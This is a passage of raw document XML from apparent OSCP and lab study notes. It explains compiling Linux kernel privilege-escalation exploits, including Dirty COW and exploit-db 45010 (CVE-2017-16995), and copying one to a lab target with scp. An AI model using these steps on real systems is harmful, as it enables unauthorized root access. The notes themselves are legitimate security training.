      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc nameOfFile.c -o outputFileName</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can specify the name that you want the executable to called by using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000365F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't specify, you will likely get a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a.out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003660">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003661">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003662">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1150">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DriftingBlues6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had to use the command "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -pthread dirty.c -o dirty -lcrypt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but that was explicitly specified in the exploitdb we used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003663">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-pthread</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Enables POSIX thread support (compile + link pthreads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003664">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-lcrypt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Links against the libcrypt library (needed for crypt() function)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003665">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Links the binary against the libcrypt library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003666">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libcrypt provides password hashing functions like crypt(), which are often used in exploits that modify /etc/passwd or create accounts with known hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003667">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l&lt;name&gt; tells the linker to look for lib&lt;name&gt;.so (or .a) in its library search path, so this loads libcrypt.so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003668">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003669">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An alternative to gcc is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> g+</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+, which can be seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1151">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lampiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirtycow2 40847.cpp -lutil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever get the error message "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc: error trying to exec 'cc1': execvp: No such file or directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" while using gcc, just use this line to update PATH </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000366F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003670">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1152">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sumo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003671">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672">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003673">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (18.4.3. Exploiting Kernel Vulnerabilities) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003674">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003675">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try to compile the program </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/local/45010.c (from exploitdb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003676">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003677">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll use gcc on Linux to compile our exploit, keeping in mind that when compiling code, we must match the architecture of our target. This is especially important in situations where the target machine does not have a compiler, and we are forced to compile the exploit on our attacking machine or in a sandboxed environment that replicates the target OS and architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003678">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003679">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although learning every detail of a Linux kernel exploit is outside the scope of this Module, we still need to understand the initial compilation instructions. To do so, let's copy the exploit into our Kali home folder and then inspect the first 20 lines of it to spot any compilation instructions.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4003344" cy="3124405"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="291" name="image281.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image281.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1153"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4003344" cy="3124405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Luckily, to compile the source code into an executable, we just need to invoke </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and specify the C source code and the output filename. To simplify this process, we could also rename the source filename to match the one expected by the exploit's procedure. Once renamed, we can simply paste the original exploit's instructions to compile the C code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000367F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv 45010.c cve-2017-16995.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003680">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003681">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make sure that the compilation process goes as smooth as possible, we take advantage of the fact that our target is already shipped with GCC. For this reason, we can compile and run the exploit on the target itself. Because of this we can take advantage of including the correct version of the libraries required by the target's architecture. This setup will lower the risks related to any cross-compilation compatibility issues. To begin with, we transfer the exploit source code over the target machine via the SCP tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003682">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003683">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp cve-2017-16995.c joe@192.168.123.216:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003684">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This colon is crucial. It tells scp that everything before the colon (joe@192.168.123.216) is the remote host and user, and everything after the colon (even if it's empty) specifies the path on that remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003685">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you provide the colon but no specific path after it, scp defaults to copying the file to the home directory of the specified user (joe in this case) on the remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003686">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003687">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once transferred, we connect to the target machine and invoke GCC to compile the exploit, providing the source code as the first argument and the binary name as the output file to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003688">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003689">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
